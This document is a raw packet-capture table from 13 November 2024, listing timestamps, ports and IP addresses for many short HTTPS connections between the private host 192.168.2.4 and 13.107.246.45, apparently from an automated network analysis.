Nov 13, 2024 18:44:43.438924074 CET	443	49942	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.438935995 CET	443	49942	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.441057920 CET	49947	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.441152096 CET	443	49947	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.441250086 CET	49947	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.441394091 CET	49947	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.441416979 CET	443	49947	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.498398066 CET	443	49943	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.499023914 CET	49943	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.499088049 CET	443	49943	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.499438047 CET	49943	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.499452114 CET	443	49943	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.538995028 CET	443	49944	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.539521933 CET	49944	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.539608955 CET	443	49944	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.539799929 CET	49944	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.539815903 CET	443	49944	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.632443905 CET	443	49943	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.632472038 CET	443	49943	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.632502079 CET	443	49943	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.632584095 CET	49943	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.632584095 CET	49943	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.632750034 CET	49943	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.632788897 CET	443	49943	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.632846117 CET	49943	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.632863045 CET	443	49943	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.635185957 CET	49948	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.635274887 CET	443	49948	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.635466099 CET	49948	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.635776043 CET	49948	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.635859013 CET	443	49948	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.670223951 CET	443	49944	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.670384884 CET	443	49944	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.670528889 CET	49944	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.672039032 CET	49944	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.672039032 CET	49944	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.672085047 CET	443	49944	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.672116995 CET	443	49944	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.672389984 CET	49949	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.672410011 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.672470093 CET	49949	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.672580957 CET	49949	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.672586918 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.731658936 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.732100010 CET	49945	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.732180119 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.732491016 CET	49945	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.732505083 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.177397966 CET	443	49947	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.177804947 CET	49947	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.177829981 CET	443	49947	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.178178072 CET	49947	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.178183079 CET	443	49947	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.306802034 CET	443	49947	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.307033062 CET	443	49947	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.307101011 CET	49947	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.307153940 CET	49947	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.307164907 CET	443	49947	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.307172060 CET	49947	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.307177067 CET	443	49947	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.309205055 CET	49950	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.309293985 CET	443	49950	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.309376955 CET	49950	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.309484005 CET	49950	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.309506893 CET	443	49950	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.349056959 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.349131107 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.349185944 CET	49945	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.349211931 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.349248886 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.349299908 CET	49945	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.349342108 CET	49945	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.349342108 CET	49945	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.349359989 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.349391937 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.351090908 CET	49951	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.351126909 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.351200104 CET	49951	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.351303101 CET	49951	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.351314068 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.382272005 CET	443	49948	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.382683039 CET	49948	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.382744074 CET	443	49948	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.383135080 CET	49948	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.383148909 CET	443	49948	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.414863110 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.415239096 CET	49949	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.415256023 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.415606022 CET	49949	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.415610075 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.514108896 CET	443	49948	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.514204025 CET	443	49948	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.514378071 CET	49948	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.516057014 CET	49948	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.516057014 CET	49948	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.516103029 CET	443	49948	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.516134024 CET	443	49948	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.518398046 CET	49952	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.518441916 CET	443	49952	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.518526077 CET	49952	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.518655062 CET	49952	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.518667936 CET	443	49952	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.545486927 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.545557022 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.545608044 CET	49949	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.545627117 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.545663118 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.545705080 CET	49949	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.545787096 CET	49949	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.545802116 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.545814991 CET	49949	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.545820951 CET	443	49949	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.547673941 CET	49953	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.547763109 CET	443	49953	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.547862053 CET	49953	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.547951937 CET	49953	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.547977924 CET	443	49953	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.668881893 CET	443	49946	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.669302940 CET	49946	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.669365883 CET	443	49946	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.669648886 CET	49946	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.669706106 CET	443	49946	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.803849936 CET	443	49946	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.804008007 CET	443	49946	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.804250956 CET	49946	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.804250956 CET	49946	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.804250956 CET	49946	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.805998087 CET	49954	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.806085110 CET	443	49954	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:44.806178093 CET	49954	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.806274891 CET	49954	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:44.806297064 CET	443	49954	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.013413906 CET	49946	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.013446093 CET	443	49946	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.180670977 CET	443	49950	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.181212902 CET	49950	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.181276083 CET	443	49950	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.181781054 CET	49950	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.181796074 CET	443	49950	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.304290056 CET	443	49952	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.304986000 CET	49952	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.305051088 CET	443	49952	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.305457115 CET	49952	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.305476904 CET	443	49952	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.308830023 CET	443	49953	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.309153080 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.309345007 CET	49953	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.309350014 CET	443	49950	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.309408903 CET	443	49953	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.309429884 CET	49951	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.309458017 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.309540033 CET	443	49950	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.309614897 CET	49950	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.309640884 CET	49953	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.309658051 CET	443	49953	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.309845924 CET	49950	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.309885025 CET	443	49950	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.309926033 CET	49950	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.309938908 CET	49951	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.309942961 CET	443	49950	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.309958935 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.312340021 CET	49955	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.312393904 CET	443	49955	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.312485933 CET	49955	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.312681913 CET	49955	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.312714100 CET	443	49955	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.433305025 CET	443	49952	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.433902979 CET	443	49952	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.434247017 CET	49952	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.435234070 CET	49952	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.435234070 CET	49952	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.435280085 CET	443	49952	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.435311079 CET	443	49952	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.436323881 CET	49956	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.436352968 CET	443	49956	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.436420918 CET	49956	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.436568975 CET	49956	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.436585903 CET	443	49956	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.437308073 CET	443	49953	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.437376976 CET	443	49953	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.437475920 CET	443	49953	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.437545061 CET	49953	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.437545061 CET	49953	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.437635899 CET	49953	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.437637091 CET	49953	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.437678099 CET	443	49953	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.437706947 CET	443	49953	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.438190937 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.438282013 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.438332081 CET	49951	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.438347101 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.438410044 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.438425064 CET	49951	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.438443899 CET	49951	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.438457966 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.438466072 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.438520908 CET	49951	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.438525915 CET	443	49951	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.439678907 CET	49957	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.439743042 CET	443	49957	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.439810991 CET	49957	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.439908028 CET	49957	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.439927101 CET	443	49957	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.440684080 CET	49958	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.440694094 CET	443	49958	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.440756083 CET	49958	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.440913916 CET	49958	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.440926075 CET	443	49958	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.538929939 CET	443	49954	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.539333105 CET	49954	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.539393902 CET	443	49954	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.539871931 CET	49954	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.539885998 CET	443	49954	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.667521954 CET	443	49954	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.667670012 CET	443	49954	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.667853117 CET	49954	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.667938948 CET	49954	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.667938948 CET	49954	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.667979956 CET	443	49954	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.668010950 CET	443	49954	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.670908928 CET	49959	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.671004057 CET	443	49959	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:45.671101093 CET	49959	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.671231985 CET	49959	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:45.671252966 CET	443	49959	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.167732000 CET	443	49955	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.168343067 CET	49955	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.168432951 CET	443	49955	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.168814898 CET	49955	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.168832064 CET	443	49955	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.178976059 CET	443	49958	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.179347038 CET	49958	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.179368973 CET	443	49958	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.179887056 CET	49958	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.179893017 CET	443	49958	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.181205988 CET	443	49956	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.181577921 CET	49956	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.181643009 CET	443	49956	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.181926966 CET	49956	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.181941986 CET	443	49956	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.205626011 CET	443	49957	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.206125975 CET	49957	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.206168890 CET	443	49957	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.206485033 CET	49957	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.206496954 CET	443	49957	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.300146103 CET	443	49955	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.300316095 CET	443	49955	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.300501108 CET	49955	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.300592899 CET	49955	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.300592899 CET	49955	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.300635099 CET	443	49955	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.300668001 CET	443	49955	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.303730965 CET	49960	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.303819895 CET	443	49960	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.304068089 CET	49960	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.304069042 CET	49960	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.304202080 CET	443	49960	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.315207958 CET	443	49958	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.315398932 CET	443	49958	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.315481901 CET	49958	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.315481901 CET	49958	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.315481901 CET	49958	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.316382885 CET	443	49956	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.316452980 CET	443	49956	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.316490889 CET	49956	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.316561937 CET	49956	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.316561937 CET	49956	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.316574097 CET	443	49956	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.316585064 CET	443	49956	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.318140030 CET	49961	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.318229914 CET	443	49961	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.318257093 CET	49962	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.318310976 CET	49961	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.318346977 CET	443	49962	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.318420887 CET	49962	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.318442106 CET	49961	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.318478107 CET	443	49961	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.318698883 CET	49962	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.318785906 CET	443	49962	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.349596977 CET	443	49957	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.349627018 CET	443	49957	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.349670887 CET	443	49957	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.349711895 CET	49957	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.349761009 CET	49957	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.349889040 CET	49957	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.349889040 CET	49957	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.349919081 CET	443	49957	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.349942923 CET	443	49957	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.352077007 CET	49963	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.352104902 CET	443	49963	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.352189064 CET	49963	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.352303982 CET	49963	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.352329969 CET	443	49963	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.621814966 CET	443	49959	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.622498035 CET	49959	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.622584105 CET	443	49959	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.622821093 CET	49958	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.622842073 CET	443	49958	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.623152971 CET	49959	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.623168945 CET	443	49959	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.775923967 CET	443	49959	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.775999069 CET	443	49959	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.776127100 CET	49959	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.776304007 CET	49959	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.776304007 CET	49959	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.776348114 CET	443	49959	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.776377916 CET	443	49959	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.779103041 CET	49964	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.779191971 CET	443	49964	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:46.779278040 CET	49964	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.779414892 CET	49964	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:46.779434919 CET	443	49964	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.038542986 CET	443	49960	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.039196968 CET	49960	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.039288044 CET	443	49960	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.039828062 CET	49960	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.039885044 CET	443	49960	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.074695110 CET	443	49961	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.075292110 CET	49961	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.075315952 CET	443	49961	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.076014996 CET	49961	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.076029062 CET	443	49961	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.077415943 CET	443	49962	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.077750921 CET	49962	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.077815056 CET	443	49962	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.078222990 CET	49962	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.078238010 CET	443	49962	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.167889118 CET	443	49960	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.167999029 CET	443	49960	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.168313980 CET	49960	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.168731928 CET	49960	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.168732882 CET	49960	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.168801069 CET	443	49960	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.168837070 CET	443	49960	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.171935081 CET	49965	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.171983004 CET	443	49965	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.172245979 CET	49965	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.172286034 CET	49965	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.172295094 CET	443	49965	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.205756903 CET	443	49961	13.107.246.45	192.168.2.4
